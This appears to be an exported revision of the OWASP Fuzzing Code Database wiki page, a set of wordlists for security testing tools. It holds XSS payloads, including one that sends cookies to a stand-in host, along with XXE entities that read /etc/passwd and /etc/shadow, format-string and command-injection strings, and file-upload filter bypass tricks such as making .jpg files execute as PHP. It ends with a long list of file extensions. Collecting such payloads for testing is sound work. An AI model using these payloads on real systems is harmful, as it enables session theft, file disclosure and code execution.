&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80068</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80068"/>
				<updated>2010-03-17T20:46:18Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
